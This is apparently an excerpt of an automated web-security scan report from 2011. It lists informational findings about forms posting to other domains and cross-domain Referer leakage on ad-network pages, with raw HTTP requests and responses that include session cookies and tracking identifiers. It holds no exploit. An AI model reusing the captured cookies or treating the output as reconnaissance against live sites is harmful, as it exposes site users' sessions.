           <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1">
           <div>
...[SNIP]...

22.5. http://www.nextadvisor.com/pmid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/

Issue detail

The page contains a form which POSTs data to the domain www.protectmyid.com. The form contains the following fields:

Request

GET /pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</div>
           <form action="http://www.protectmyid.com/prepop.aspx?sc=671948&bcd=" method="post" id="signupform" name="signupform">
               <div id="form">
...[SNIP]...

22.6. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain psr.infusionsoft.com. The form contains the following fields:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</h2>
<form action="https://psr.infusionsoft.com/AddForms/processFormSecure.jsp" method="POST">
<input type="hidden" value="b022f83af8b7aceafab573cd5cfaa3b2" name="infusion_xid" id="infusion_xid" />
...[SNIP]...

23. Cross-domain Referer leakage  previous  next
There are 612 instances of this issue:


23.1. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4;sz=728x90;u=xbAGfINSJQJfsPowBk61VJFCxPLNndhfkuRy1CihyB3qJ4Q492Ptbr5RqmD9uaZTl_Y_7FpMEqqTPjwT77j4BOQSw_Z6u9lJ4okA;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676405&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658405706&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303658405710&frm=1&adk=513358139&ga_vid=151306687.1303658406&ga_sid=1303658406&ga_hid=1762151746&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=33895132&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:20:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7658

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 18 09:14:29 EST 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
=0&sig=AGiWqtxFw8XgoaX73WS8J9ihziC4VHCEMA&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/?site=c-invite&utm_term=banner1c&utm_source=en-na-ha-rm-invite&utm_medium=ad&utm_campaign=en"><img src="http://s1.2mdn.net/2675039/1-GGL_ADWORDS_CREATIVE1_728x90_GEN_B01_v2.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.2. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.5;sz=160x600;u=xbAGfINSK1OZWyHfmPFFZjnYQ6_JEp6H70AsIgNy-WZB8vSB27OKaPWUYao00pJ4lGiHB7cajRTGDbuikyptjy1We14lklZG7rSQ;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676480&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658480882&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658480896&frm=1&adk=2614322350&ga_vid=653637234.1303658481&ga_sid=1303658481&ga_hid=1490794474&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=18
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:21:19 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7589

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 23 13:36:24 EDT 2011 -->
<script src="http://s1.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
&sig=AGiWqtw0-SEBMU7w7UlrTm3Jp9WJQw_99g&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/?site=uc-invite&utm_term=banner2uc&utm_source=en-na-ha-rm-invite&utm_medium=ad&utm_campaign=en"><img src="http://s1.2mdn.net/2675039/img1_160_600.jpg" width="160" height="600" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

23.3. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=c4bd92c5&rnd=52328011882491410&clkurl=http://ib.adnxs.com/click/zszMzMzM3D_NzMzMzMzcPwAAAMDMzARA-oTsvI3N5T_5hOy8jc3lPw371D7bYuY9SsYda6b2ziWMP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgAbC0sAAg8BAgUCAAQAAAAAFywibgAAAAA./cnd=!CxAduAiQmQMQyMkKGAAg0ccBKEsxRkF1FY7N5T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBxA4vjD-0TaSTNcyBlgeAsZ25A9fq-NMBr56U7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYS5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmALCA8ACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAb746GF_uDvrsAB%26num%3D1%26sig%3DAGiWqtzq6jdVFSiz91eOPCoaaXhjQFcD_w%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383860&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658383865&frm=1&adk=513358139&ga_vid=27783855.1303658384&ga_sid=1303658384&ga_hid=2094739292&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUI2s0JMGhZPIDYO0t7dlEyAtu1iADA3gBY2BgEGBg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhJ02VK4NKPcdKOcCk2s_uXMTLn3tJ2fU4pQ7IbwYp9yxBY9wyh39KohTbsYCdtxytq045aY_9MQt17ESt5ypLk65aTcVccpVlvkyME0OZWB1eMLAqJPHwPBR6D8QgMI6P4CxmoHJ34aB5YU3A6MWEwPDpWewsE5TnhUElLOCyjEC5R7A5ZSk1IFsRtx2dgsB5Rl8N2cwMHAAI3YnI1AxQ.AtRiYgxWDAyMDLwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZ2OHpAWQYAwD8zXas

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUGEe16DD_.i537edfAbbPWkakQ6kDA3gBY2BgEGRg6lzCwJLdxsDI.52B4YYLAwMDJwMDo36HhPttqFwLUO4nUM4NIWenjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FeYHzDc2T5jATtOfTNsW3HKTX_oiVuuYyVuOVNdnHLTbirilKss82VgmhzKwOrwhIFRJ4.B4aPQfyAAxUN.AGM1A5O_DQPLC28GRi0mBoZLz2DxkKY8KwgoZwWVYwTKPYDLKUmpA9mMuO3sFgLKM_huzmBg4ABG.k5GoGKGwFuMTECKwYCRgY.BQcEMLLi0ACzIksnICpRjCWFiZWQDMuR3MTKww9MKyDAGABgQfac-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 15:19:43 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5122
Date: Sun, 24 Apr 2011 15:19:43 GMT

_289670_amg_acamp_id=166308;
_289670_amg_pcamp_id=69111;
_289670_amg_location_id=55364;
_289670_amg_creative_id=289670;
_289670_amg_loaded=true;
var _amg_289670_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732014/direct/01/rnd=1778809137/rnd=1778809137?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9J3wUw8q4YExaZwcQwxmt94lwjdnZW8sdXNhLHQsMTMwMzY1ODM4MzMyMyxjLDI4OTY3MCxwYyw2OTExMSxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3pzek16TXpNM0RfTnpNek16TXpjUHdBQUFNRE16QVJBLW9Uc3ZJM041VF81aE95OGpjM2xQdzM3MUQ3Yll1WTlTc1lkYTZiMnppV01QN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0FiQzBzQUFnOEJBZ1VDQUFRQUFBQUFGeXdpYmdBQUFBQS4vY25kPSFDeEFkdUFpUW1RTVF5TWtLR0FBZzBjY0JLRXN4UmtGMUZZN041VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vY2xpY2tlbmM9aHR0cDovL2dvb2dsZWFkcy5nLmRvdWJsZWNsaWNrLm5ldC9hY2xrP3NhPWwmYWk9QnhBNHZqRC0wVGFTVE5jeUJsZ2VBc1oyNUE5ZnEtTk1CcjU2VTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUpOekk0ZURrd1gyRnp5QUVKMmdGSWFIUjBjRG92TDNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjBMMkpoYm01bGNsODNNamhmT1RCZllTNXdhSEFfYzJWaGNtTm9QU1UzUWlSclpYbDNiM0prSlRkRW1BTENBOEFDQk1nQ2hkTFBDcWdEQWVnRHZBSG9BNVFDOVFNQUFBREVnQWI3NDZHRl91RHZyc0FCJm51bT0xJnNpZz1BR2lXcXR6cTZqZFZGU2l6OTFlT1BDb2FhWGhqUUZjRF93JmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K/clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU9J3wUw8q4YExaZwcQwxmt94lwjdnZW8sdXNhLHQsMTMwMzY1ODM4MzMyMyxjLDI4OTY3MCxwYyw2OTExMSxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL3pzek16TXpNM0RfTnpNek16TXpjUHdBQUFNRE16QVJBLW9Uc3ZJM041VF81aE95OGpjM2xQdzM3MUQ3Yll1WTlTc1lkYTZiMnppV01QN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFESXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0FiQzBzQUFnOEJBZ1VDQUFRQUFBQUFGeXdpYmdBQUFBQS4vY25kPSFDeEFkdUFpUW1RTVF5TWtLR0FBZzBjY0JLRXN4UmtGMUZZN041VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vY2xpY2tlbmM9aHR0cDovL2dvb2dsZWFkcy5nLmRvdWJsZWNsaWNrLm5ldC9hY2xrP3NhPWwmYWk9QnhBNHZqRC0wVGFTVE5jeUJsZ2VBc1oyNUE5ZnEtTk1CcjU2VTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUpOekk0ZURrd1gyRnp5QUVKMmdGSWFIUjBjRG92TDNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjBMMkpoYm01bGNsODNNamhmT1RCZllTNXdhSEFfYzJWaGNtTm9QU1UzUWlSclpYbDNiM0prSlRkRW1BTENBOEFDQk1nQ2hkTFBDcWdEQWVnRHZBSG9BNVFDOVFNQUFBREVnQWI3NDZHRl91RHZyc0FCJm51bT0xJnNpZz1BR2lXcXR6cTZqZFZGU2l6OTFlT1BDb2FhWGhqUUZjRF93JmNsaWVudD1jYS1wdWItNjg4ODA2NTY2ODI5MjYzOCZhZHVybD0K/clkurl=">\n'+
'</script>
...[SNIP]...
Q0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0FiNzQ2R0ZfdUR2cnNBQiZudW09MSZzaWc9QUdpV3F0enE2amRWRlNpejkxZU9QQ29hYVhoalFGY0RfdyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732014/direct/01/rnd=1778809137" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69111&c5=166308&c6=&cv=1.3&cj=1&rn=1201744682" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.4. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=6731433467939496&clkurl=http://ib.adnxs.com/click/CtejcD0Ktz8K16NwPQq3PwAAAEAzMwdAe0ykNJvH5j97TKQ0m8fmP4tkw7_c_Kt8SsYda6b2ziXRVLRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA8A4BAgUCAAQAAAAAByScegAAAAA./cnd=!XRBRyQiQmQMQxskKGAAg0ccBKEsxQyNyhZvH5j9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBuDo_0VS0Te6lHJbulQfVl6mfAtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCWsACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwKw2NSpsBuz7_grX_7oWb99Jw51w%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681828&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663828367&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663828373&frm=1&adk=2614322350&ga_vid=2143277132.1303663828&ga_sid=1303663828&ga_hid=1947261372&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUAsM9TbmlvrBQFYLaCizF.1a6GKYDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35Hktt1nHIRXtdwyvlNCMEp59rAAZVrA9r3HWifC9w.CffbOPVJ2Gnj0td.cucmXPraT86oxSl3QngxTrljCx7hlDv6VRCn3IwF7LjlbFtxyk1_6IlbrmMlbjlTXZxy024q4pSrLPNlYJocysDq8ISBUSePgeGj0H8gAMV7fgBjNQOTvw0DywtvBkYtJgaGS89gcZSmPCsIyGbEbW63EFCewXdzBgMDBzAh7WQEKmYIvMXIBKQYDBgZgNIKZmDBpQVgQZZMRlagHEsIEysjG5Ahv4uRgQec_rKdjoPMYmAAAPD5kmE-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUhvvA3uMYtZiectC07uf2QDyvEasDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HdswpnHJJbtdxykV4XcMp5zchBKecawMHVK4N6JbvQLe4wN0i4X4bpz4JO21c.tpP7tyES1_7yRm1OOVOCC_GKXdswSOccke_CuKUm7GAHbecbStOuekPPXHLdazELWeqi1Nu2k1FnHKVZb4MTJNDGVgdnjAw6uQxMHwU.g8EoDSRH8BYDYwTRtx6u4WA8gy.mzMYGDiACWknI1AxQ.AtRiYgxWDAyCDMwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZeODpD2QYAwCGTZPB; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:50:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4055
Date: Sun, 24 Apr 2011 16:50:27 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1534348375?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU8U3PQ2ZpisS_seOpO7ZDo785pE5nZW8sdXNhLHQsMTMwMzY2MzgyODE3MCxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0N0ZWpjRDBLdHo4SzE2TndQUXEzUHdBQUFFQXpNd2RBZTB5a05Kdkg1ajk3VEtRMG04Zm1QNHRrdzdfY19LdDhTc1lkYTZiMnppWFJWTFJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQThBNEJBZ1VDQUFRQUFBQUFCeVNjZWdBQUFBQS4vY25kPSFYUkJSeVFpUW1RTVF4c2tLR0FBZzBjY0JLRXN4UXlOeWhadkg1ajlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJ1RG9fMFZTMFRlNmxISmJ1bFFmVmw2bWZBdGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWk